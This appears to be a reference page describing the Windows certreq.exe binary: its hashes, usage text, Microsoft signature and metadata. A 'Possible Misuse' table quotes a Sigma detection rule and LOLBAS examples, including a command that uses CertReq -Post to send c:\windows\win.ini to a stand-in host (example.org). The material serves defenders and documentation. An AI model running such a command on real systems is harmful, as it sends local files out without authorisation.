certreq.exe

  • File Path: C:\WINDOWS\SysWOW64\certreq.exe
  • Description: CertReq.exe

Screenshot

certreq.exe

Hashes

Type Hash
MD5 1B7605D3ABAF54DDC4A36114BD183B50
SHA1 76C1FCDEB4BC7EF3E3971AAB8C36C62E25DA33DE
SHA256 12F4C455B0A8E3E0B679841AEF920616D43DD2898B780C23A962236A5F2B8A09
SHA384 05502452A80F6D89FC96E9CEB5B9B6F4D87B767D0994893A1175C81B38DB25E21FE07082AA1013F1C21E72FF933EA8DF
SHA512 25214FCAE7123445540601F9A6B2217123FA431490E4083FE971BDF107D20DD17DD1425DEB01678269F994B44F44B3350A2F88C90CE602B37C20262EF3A2DF48
SSDEEP 6144:ywwR7re3Aw043EWZg/DUK4imJCeBySNaz79qXquhWTeM6MoSXhzdHdfzV44h:TOgAZfUKDmJCeBJNav9qXquExdd7C4h

Runtime Data

Usage (stdout):

Usage:
  CertReq -?
  CertReq [-v] -?
  CertReq [-Command] -?

  CertReq [-Submit] [Options] [RequestFileIn [CertFileOut [CertChainFileOut [FullResponseFileOut]]]]
    Submit a request to a Certification Authority.

  Options:
    -attrib AttributeString
    -binary
    -PolicyServer PolicyServer
    -config ConfigString
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -crl
    -rpc
    -AdminForceMachine
    -RenewOnBehalfOf
    -NoChallenge

  CertReq -Retrieve [Options] RequestId [CertFileOut [CertChainFileOut [FullResponseFileOut]]]
    Retrieve a response to a previous request from a Certification Authority.

  Options:
    -binary
    -PolicyServer PolicyServer
    -config ConfigString
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -crl
    -rpc
    -AdminForceMachine

  CertReq -New [Options] [PolicyFileIn [RequestFileOut]]
    Create a new request as directed by PolicyFileIn

  Options:
    -attrib AttributeString
    -binary
    -cert CertId
    -PolicyServer PolicyServer
    -config ConfigString
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -pin Pin
    -user
    -machine
    -xchg ExchangeCertFile

  CertReq -Accept [Options] [CertChainFileIn | FullResponseFileIn | CertFileIn]
    Accept and install a response to a previous new request.

  Options:
    -user 
    -machine 
    -pin Pin

  CertReq -Policy [Options] [RequestFileIn [PolicyFileIn [RequestFileOut [PKCS10FileOut]]]]
    Construct a cross certification or qualified subordination request
    from an existing CA certificate or from an existing request.

  Options:
    -attrib AttributeString
    -binary
    -cert CertId
    -PolicyServer PolicyServer
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -pin Pin
    -noEKU
    -AlternateSignatureAlgorithm
    -HashAlgorithm HashAlgorithm

  CertReq -Sign [Options] [RequestFileIn [RequestFileOut]]
    Sign a certificate request with an enrollment agent or qualified
    subordination signing certificate.

  Options:
    -binary
    -cert CertId
    -PolicyServer PolicyServer
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -pin Pin
    -crl
    -noEKU
    -HashAlgorithm HashAlgorithm

  CertReq -Enroll [Options] TemplateName
  CertReq -Enroll -cert CertId [Options] Renew [ReuseKeys]
    Enroll for or renew a certificate.

  Options:
    -PolicyServer PolicyServer
    -user 
    -machine 
    -pin Pin

  CertReq -EnrollAIK [Options] [KeyContainerName]
    Enroll for AIK certificate.

  Options:
    -config

  CertReq -EnrollCredGuardCert [Options] TemplateName [ExtensionInfFile]
    NOTE: Enrolling for machine account Credential Guard certificate is not supported on this platform.

  Options:
    Not supported on this platform

  CertReq -EnrollLogon [Options]
    Enroll for Hello for Business Logon certificate via ADFS.

  Options:
    -q

  CertReq -Post [Options]
    POST an http request.

  Options:
    -attrib AttributeString
    -config URL

Unknown argument: -help

Child Processes:

conhost.exe

Signature

  • Status: Signature verified.
  • Serial: 330000023241FB59996DCC4DFF000000000232
  • Thumbprint: FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: CertReq.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.18362.1 (WinBuild.160101.0800)
  • Product Version: 10.0.18362.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of certreq.exe being misused. While certreq.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_susp_certreq_download.yml title: Suspicious Certreq Command to Download DRL 1.0
sigma proc_creation_win_susp_certreq_download.yml description: Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files DRL 1.0
sigma proc_creation_win_susp_certreq_download.yml - https://lolbas-project.github.io/lolbas/Binaries/Certreq/ DRL 1.0
sigma proc_creation_win_susp_certreq_download.yml Image\|endswith: '\certreq.exe' DRL 1.0
LOLBAS Certreq.yml Name: CertReq.exe  
LOLBAS Certreq.yml - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt  
LOLBAS Certreq.yml - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal  
LOLBAS Certreq.yml - Path: C:\Windows\System32\certreq.exe  
LOLBAS Certreq.yml - Path: C:\Windows\SysWOW64\certreq.exe  
LOLBAS Certreq.yml - IOC: certreq creates new files  
LOLBAS Certreq.yml - IOC: certreq makes POST requests  
LOLBAS Certreq.yml - Link: https://dtm.uk/certreq  

MIT License. Copyright (c) 2020-2021 Strontic.